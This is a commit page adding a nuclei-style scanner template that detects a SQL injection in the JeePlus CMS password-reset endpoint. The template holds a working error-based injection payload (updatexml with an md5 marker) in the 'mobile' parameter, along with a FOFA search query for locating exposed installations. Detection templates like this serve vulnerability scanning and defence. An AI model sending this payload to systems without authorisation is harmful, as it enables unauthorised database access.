Merge pull request #11403 from WingBy-Fkalis/main

Add jeeplus-cms-resetpassword-sqli
projectdiscovery · Jan 2, 2025 · e742fa9 · e742fa9
2 parents 7e6a326 + 949da11
commit e742fa9
Showing 1 changed file with 31 additions and 0 deletions.
diff --git a/http/vulnerabilities/other/jeeplus-cms-resetpassword-sqli.yaml b/http/vulnerabilities/other/jeeplus-cms-resetpassword-sqli.yaml
@@ -0,0 +1,31 @@
+id: jeeplus-cms-resetpassword-sqli
+
+info:
+  name: JeePlus CMS - SQL Injection
+  author: WingBy_fkalis
+  severity: high
+  description: |
+    A SQL injection vulnerability exists in the JeePlus low-code development platform, allowing attackers to manipulate database queries.This can lead to unauthorized data access, modification, or potential compromise of the application.
+  reference:
+    - https://github.com/wy876/wiki/blob/main/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+    - http://www.cstam.oyg.cn/detail/429410
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: body="jeeplus.js" && body="/static/common/"
+  tags: jeeplus,jeecg,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1))%23"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(body,'c8c605999f3d8352d7bb792cf3fdb25', 'XPATH')"
+        condition: and